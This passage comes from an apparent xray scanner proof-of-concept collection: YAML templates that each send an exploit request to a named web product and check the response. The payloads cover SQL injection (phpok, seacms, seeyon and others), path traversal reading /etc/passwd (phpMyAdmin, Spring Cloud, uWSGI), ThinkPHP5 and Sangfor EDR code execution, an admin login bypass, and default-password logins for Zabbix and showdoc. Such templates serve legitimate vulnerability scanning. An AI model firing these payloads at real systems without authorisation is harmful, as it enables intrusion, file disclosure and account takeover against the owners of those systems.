follow_redirects: false 14 | expression: response.body.bcontains(bytes(md5(string(rand)))) 15 | expression: r0() 16 | detail: 17 | author: 17bdw 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 20 | -------------------------------------------------------------------------------- /web/pocs/xray2/phpmyadmin-cve-2018-12613-file-inclusion.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 10 | follow_redirects: false 11 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/phpmyadmin-setup-deserialization.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpmyadmin-setup-deserialization 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /scripts/setup.php 10 | body: action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} 11 | follow_redirects: false 12 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 13 | expression: r0() 14 | detail: 15 | author: p0wd3r 16 | links: 17 | - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/phpok-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpok-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{r1}}))) --+ 12 | expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 13 | expression: r0() 14 | detail: 15 | author: jinqi 16 | links: 17 | - https://github.com/jinqi520 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/phpshe-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpshe-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,CONCAT%28md5({{rand}})%29,4,5,6,7,8,9,10,11,12%23_ 12 | expression: response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: hhdaddy 16 | links: 17 | - https://www.cnblogs.com/Spec/p/10718046.html 18 | Affected Version: "1.7" 19 | -------------------------------------------------------------------------------- /web/pocs/xray2/prometheus-url-redirection-cve-2021-29622.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-prometheus-url-redirection-cve-2021-29622 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /new/newhttps:/baidu.com 10 | follow_redirects: false 11 | expression: response.status == 302 && response.headers["location"] == "https:/baidu.com?" 12 | expression: r0() 13 | detail: 14 | author: fuzz7j(https://github.com/fuzz7j) 15 | links: 16 | - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/qibocms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-qibocms-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /f/job.php?job=getzone&typeid=zone&fup=..\..\do\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5({{rand}}),9,10,11,12,13,14,15,16,17,18,19%23 12 | expression: response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: Rexus 16 | links: 17 | - https://www.ld-fcw.com/ 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/resin-cnnvd-200705-315.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-cnnvd-200705-315 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /%20../web-inf/ 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"/ ../web-inf/") && response.body.bcontains(b"Directory of /") 12 | expression: r0() 13 | detail: 14 | author: whynot(https://github.com/notwhy) 15 | links: 16 | - https://www.secpulse.com/archives/39144.html 17 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/resin-viewfile-fileread.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-viewfile-fileread 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /resin-doc/viewfile/?file=index.jsp 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(bytes("%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %")) 12 | expression: r0() 13 | detail: 14 | author: whynot(https://github.com/notwhy) 15 | links: 16 | - https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205 17 | - http://0day5.com/archives/1173/ 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/sangfor-edr-arbitrary-admin-login.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-arbitrary-admin-login 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /ui/login.php?user=admin 10 | follow_redirects: false 11 | expression: response.status == 302 && response.body.bcontains(b"/download/edr_installer_") && response.headers["Set-Cookie"] != "" 12 | expression: r0() 13 | detail: 14 | author: hilson 15 | links: 16 | - https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/sangfor-edr-tool-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-tool-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomLowercase(8) 6 | r2: randomLowercase(8) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: GET 12 | path: /tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}} 13 | follow_redirects: false 14 | expression: response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2)) 15 | expression: r0() 16 | detail: 17 | author: cookie 18 | links: 19 | - https://edr.sangfor.com.cn/ 20 | -------------------------------------------------------------------------------- /web/pocs/xray2/seacms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27` 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(b"6f7c6dcbc380aac3bcba1f9fccec99") 12 | expression: r0() 13 | detail: 14 | author: MaxSecurity(https://github.com/MaxSecurity) 15 | links: 16 | - https://www.uedbox.com/post/54561/ 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/seeyon-a6-test-jsp-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-a6-test-jsp-sql 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}})) 12 | expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: sakura404x 16 | links: 17 | - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3346.md 18 | version: 致远A6 19 | -------------------------------------------------------------------------------- /web/pocs/xray2/seeyon-session-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-session-leak 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll 10 | expression: response.status == 200 && response.body.bcontains(b"\r\n\r\n") 11 | expression: r0() 12 | detail: 13 | author: sakura404x 14 | links: 15 | - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3345.md 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/seeyon-wooyun-2015-0108235-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-wooyun-2015-0108235-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1)%20and%201=2%20union%20select%201,2,3,4,5,md5({{rand}}),7-- 12 | expression: response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: Rexus 16 | links: 17 | - https://bugs.shuimugan.com/bug/view?bug_no=0108235 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/shiziyu-cms-apicontroller-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-shiziyu-cms-apicontroller-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1) 12 | expression: response.status == 404 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31))) 13 | expression: r0() 14 | detail: 15 | author: sakura404x 16 | links: 17 | - https://blog.csdn.net/weixin_42633229/article/details/117070546 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/showdoc-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-showdoc-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /server/index.php?s=/api/user/login 10 | body: username=showdoc&password=123456 11 | follow_redirects: true 12 | expression: response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"groupid") && response.body.bcontains(b"user_token") 13 | expression: r0() 14 | detail: 15 | author: B1anda0(https://github.com/B1anda0) 16 | links: 17 | - https://blog.star7th.com/2016/05/2007.html 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/spark-api-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spark-api-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /v1/submissions 10 | expression: response.status == 400 && response.body.bcontains(b"Missing an action") && response.body.bcontains(b"serverSparkVersion") 11 | expression: r0() 12 | detail: 13 | author: betta(https://github.com/betta-cyber) 14 | links: 15 | - https://xz.aliyun.com/t/2490 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/spark-webui-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spark-webui-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: / 10 | expression: response.status == 200 && response.body.bcontains(b"Spark") && response.body.bcontains(b"<strong>URL:</strong> spark:") 11 | expression: r0() 12 | detail: 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/spark/unacc 15 | -------------------------------------------------------------------------------- /web/pocs/xray2/spring-cloud-cve-2020-5410.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cloud-cve-2020-5410 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a 10 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 11 | expression: r0() 12 | detail: 13 | author: Soveless(https://github.com/Soveless) 14 | links: 15 | - https://xz.aliyun.com/t/7877 16 | Affected Version: Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/springcloud-cve-2019-3799.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-springcloud-cve-2019-3799 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd 10 | follow_redirects: true 11 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: Loneyer 15 | links: 16 | - https://github.com/Loneyers/vuldocker/tree/master/spring/CVE-2019-3799 17 | version: <2.1.2, 2.0.4, 1.4.6 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/thinkcmf-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkcmf-lfi 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /?a=display&templateFile=README.md 10 | expression: response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README"))) 11 | expression: r0() 12 | detail: 13 | author: JerryKing 14 | links: 15 | - https://www.freebuf.com/vuls/217586.html 16 | ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/thinkphp5-controller-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5-controller-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91 10 | expression: response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129") 11 | expression: r0() 12 | detail: 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce 15 | -------------------------------------------------------------------------------- /web/pocs/xray2/tianqing-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tianqing-info-leak 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/dbstat/gettablessize 10 | expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"schema_name") && response.body.bcontains(b"table_name") 11 | expression: r0() 12 | detail: 13 | author: jingling(https://github.com/shmilylty) 14 | links: 15 | - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/uwsgi-cve-2018-7490.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-uwsgi-cve-2018-7490 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 10 | follow_redirects: false 11 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | links: 15 | - https://github.com/vulhub/vulhub/tree/master/uwsgi/CVE-2018-7490 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/yccms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yccms-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomInt(800000000, 1000000000) 6 | r1: randomInt(800000000, 1000000000) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: GET 12 | path: /admin/?a=Factory();print({{r}}%2b{{r1}});//../ 13 | expression: response.body.bcontains(bytes(string(r + r1))) 14 | expression: r0() 15 | detail: 16 | author: j4ckzh0u(https://github.com/j4ckzh0u),violin 17 | links: 18 | - https://blog.csdn.net/qq_36374896/article/details/84839891 19 | yccms: v3.3 20 | -------------------------------------------------------------------------------- /web/pocs/xray2/yungoucms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yungoucms-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(2000000000, 2100000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /?/member/cart/Fastpay&shopid=-1%20union%20select%20md5({{rand}}),2,3,4%20--+ 12 | follow_redirects: false 13 | expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 14 | expression: r0() 15 | detail: 16 | author: cc_ci(https://github.com/cc8ci) 17 | links: 18 | - https://www.secquan.org/Prime/1069179 19 | -------------------------------------------------------------------------------- /web/pocs/xray2/zabbix-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zabbix-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /index.php 10 | body: name=Admin&password=zabbix&autologin=1&enter=Sign+in 11 | expression: response.status == 302 && response.headers["location"] == "zabbix.php?action=dashboard.view" && response.headers["set-cookie"].contains("zbx_session") 12 | expression: r0() 13 | detail: 14 | author: fuzz7j(https://github.com/fuzz7j) 15 | links: 16 | - https://www.zabbix.com/documentation/3.4/zh/manual/quickstart/login 17 | --------------------------------------------------------------------------------